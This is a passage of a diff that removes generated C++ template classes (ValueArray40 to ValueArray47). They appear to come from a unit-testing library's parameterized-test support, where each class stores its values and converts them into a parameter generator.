-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray40& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-class ValueArray41 {
- public:
-  ValueArray41(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40,
-      T41 v41) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray41& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-class ValueArray42 {
- public:
-  ValueArray42(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41), v42_(v42) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray42& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-class ValueArray43 {
- public:
-  ValueArray43(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19),
-      v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25),
-      v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31),
-      v32_(v32), v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37),
-      v38_(v38), v39_(v39), v40_(v40), v41_(v41), v42_(v42), v43_(v43) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray43& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-class ValueArray44 {
- public:
-  ValueArray44(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24),
-      v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30),
-      v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35), v36_(v36),
-      v37_(v37), v38_(v38), v39_(v39), v40_(v40), v41_(v41), v42_(v42),
-      v43_(v43), v44_(v44) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray44& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-class ValueArray45 {
- public:
-  ValueArray45(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23),
-      v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29),
-      v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35),
-      v36_(v36), v37_(v37), v38_(v38), v39_(v39), v40_(v40), v41_(v41),
-      v42_(v42), v43_(v43), v44_(v44), v45_(v45) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray45& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-class ValueArray46 {
- public:
-  ValueArray46(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39), v40_(v40),
-      v41_(v41), v42_(v42), v43_(v43), v44_(v44), v45_(v45), v46_(v46) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray46& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-class ValueArray47 {
- public:
-  ValueArray47(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39), v40_(v40),
-      v41_(v41), v42_(v42), v43_(v43), v44_(v44), v45_(v45), v46_(v46),
-      v47_(v47) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray47& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
